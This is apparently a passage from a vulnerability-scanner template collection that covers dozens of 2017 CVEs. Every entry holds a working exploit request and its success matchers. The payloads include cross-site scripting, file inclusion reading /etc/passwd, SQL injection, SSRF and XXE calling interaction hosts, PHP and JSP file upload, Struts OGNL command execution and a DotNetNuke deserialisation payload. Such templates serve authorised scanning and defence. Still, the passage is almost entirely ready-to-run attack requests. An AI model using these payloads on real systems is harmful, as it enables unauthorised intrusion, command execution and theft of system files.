*/*\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"{{randstr_1}}\")"]}]}]},{"id":"CVE-2017-8229","info":{"name":"Amcrest IP Camera Web Management - Data Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/current_config/Sha1Account1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DevInformation","SerialID"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17043","info":{"name":"WordPress Emag Marketplace Connector 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/emag-marketplace-connector/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18529","info":{"name":"PromoBar by BestWebSoft < 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/promobar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"PromoBar by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-15647","info":{"name":"FiberHome Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18562","info":{"name":"Error Log Viewer by BestWebSoft < 1.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/error-log-viewer/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Error Log Viewer by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-17059","info":{"name":"WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/amty-thumb-recent-post/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Amty Thumb","Tags:"],"condition":"and","case-insensitive":true}]},{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1"],"body":"amty_hidden=1","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14524","info":{"name":"OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2017-15363","info":{"name":"Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<?php","'host'","'database'","'extConf'","'debug'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14622","info":{"name":"WordPress 2kb Amazon Affiliates Store <2.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 500","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"2kb-amazon-affiliates-store\")"],"condition":"and"}]}]},{"id":"CVE-2017-3132","info":{"name":"Fortinet FortiOS < 5.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var action = '</script><script>alert(document.domain)</script><script>"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11444","info":{"name":"Subrion CMS <4.1.5.10 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%27{{hex_string}}%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{string}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-0929","info":{"name":"DotNetNuke (DNN) ImageHandler <9.2.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2017-11165","info":{"name":"DataTaker DT80 dEX 1.50.012 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/getFile.cmd?userfile=config.xml"],"matchers-condition":"and","matchers":[{"type":"word","words":["COMMAND_SERVER","<loggerSettings>","config id=\"config"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12629","info":{"name":"Apache Solr <= 7.1 - XML Entity Injection","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\n","GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2017-6090","info":{"name":"PhpColl 2.5.1 Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137\n\n-----------------------------154934846911423734231554128137\nContent-Disposition: form-data; name=\"upload\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n-----------------------------154934846911423734231554128137--\n","GET /logos_clients/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18537","info":{"name":"Visitors Online by BestWebSoft < 1.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/visitors-online/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Visitors Online by\")"],"condition":"and"}]}]},{"id":"CVE-2017-1000029","info":{"name":"Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/file%3a///etc/passwd/"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18492","info":{"name":"Contact Form to DB by BestWebSoft < 1.5.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/contact-form-to-db/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Contact Form to DB by\")"],"condition":"and"}]}]},{"id":"CVE-2017-18542","info":{"name":"Zendesk Help Center by BestWebSoft < 1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/zendesk-help-center/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Zendesk Help Center by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-9506","info":{"name":"Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-9140","info":{"name":"Reflected XSS - Telerik Reporting Module","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)"],"matchers-condition":"and","matchers":[{"type":"word","words":["#000000\"onload=\"prompt(1)","Telerik.ReportViewer.axd?name=Resources"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14651","info":{"name":"WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","Failed to add new collection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2017-5638","info":{"name":"Apache Struts 2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd=\"cat /etc/passwd\",#cmds={\"/bin/bash\",\"-c\",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000163","info":{"name":"Phoenix Framework - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?redirect=/\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2017-12542","info":{"name":"HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/v1/AccountService/Accounts"],"headers":{"Connection":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["iLO User"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18564","info":{"name":"Sender by BestWebSoft < 1.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/sender/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Sender by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18500","info":{"name":"Social Buttons Pack by BestWebSof < 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/social-buttons-pack/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Social Buttons Pack by\")"],"condition":"and"}]}]},{"id":"CVE-2017-5631","info":{"name":"KMCIS CaseAware - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9822","info":{"name":"DotNetNuke 5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /__ HTTP/1.1\nHost: {{Hostname}}\nAccept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nCookie: dnn_IsMobile=False; DNNPersonalization=<profile><item key=\"name1: key1\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type=\"xsd:string\">C:\\Windows\\win.ini</anyType></MethodParameters><ObjectInstance xsi:type=\"FileSystemUtils\"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[extensions]","for 16-bit app support"],"condition":"and"},{"type":"status","status":[404]}]}]},{"id":"CVE-2017-12794","info":{"name":"Django Debug Page - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18024","info":{"name":"AvantFAX 3.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin&password=admin&_submit_check=1&jlbqg<script>alert(\"{{randstr}}\")</script>b7g0x=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(\"{{randstr}}\")</script>","AvantFAX"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18557","info":{"name":"Google Maps by BestWebSoft < 1.3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-google-maps/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Google Maps by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18496","info":{"name":"Htaccess by BestWebSoft < 1.7.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/htaccess/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Htaccess by\")"],"condition":"and"}]}]},{"id":"CVE-2017-18505","info":{"name":"BestWebSoft's Twitter < 2.55 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/twitter-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Twitter Button by\")"],"condition":"and"}]}]},{"id":"CVE-2017-16806","info":{"name":"Ulterius Server < 1.9.5.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9833","info":{"name":"BOA Web Server 0.94.14 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5871","info":{"name":"Odoo <= 8.0-20160726 & 9.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/session/logout?redirect=https://oast.me","{{BaseURL}}/web/session/logout?redirect=https%3a%2f%2foast.me%2f","{{BaseURL}}/web/dbredirect?redirect=https%3a%2f%2foast.me%2f"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2017-18598","info":{"name":"WordPress Qards - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/qards/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["console.log"]}]}]},{"id":"CVE-2017-18491","info":{"name":"Contact Form by BestWebSoft < 4.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/contact-form-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Contact Form by\")"],"condition":"and"}]}]},{"id":"CVE-2017-3131","info":{"name":"FortiOS 5.4.0 to 5.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /logincheck HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain;charset=UTF-8\n\najax=1&username={{username}}&secretkey={{password}}\n","GET /ng/fortiview/app/15832%22%20onmouseover=alert(document.domain)%20x=%22y HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["id_15832\" onmouseover=\"alert(document.domain)\""]},{"type":"word","part":"content_type_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11610","info":{"name":"XML-RPC Server - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /RPC2 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/xml\nContent-type: text/xml\n\n<methodCall>\n  <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>\n  <params>\n    <param>\n      <string>nslookup {{interactsh-url}}</string>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["text/xml"]},{"type":"word","part":"body","words":["<methodResponse>","<int>"],"condition":"and"}]}]},{"id":"CVE-2017-12617","info":{"name":"Apache Tomcat - Remote Code Execution","severity":"high"},"requests":[{"raw":["PUT /{{randstr}}.jsp/ HTTP/1.1\nHost: {{Hostname}}\n\n<% out.println(\"CVE-2017-12617\");%>\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["CVE-2017-12617"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18532","info":{"name":"Realty by BestWebSoft < 1.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/realty/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Realty by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-9791","info":{"name":"Apache Struts2 S2-053 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/integration/saveGangster.action"],"body":"name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%28{{num1}}%2a{{num2}}%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{result}}","added successfully"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000170","info":{"name":"WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File 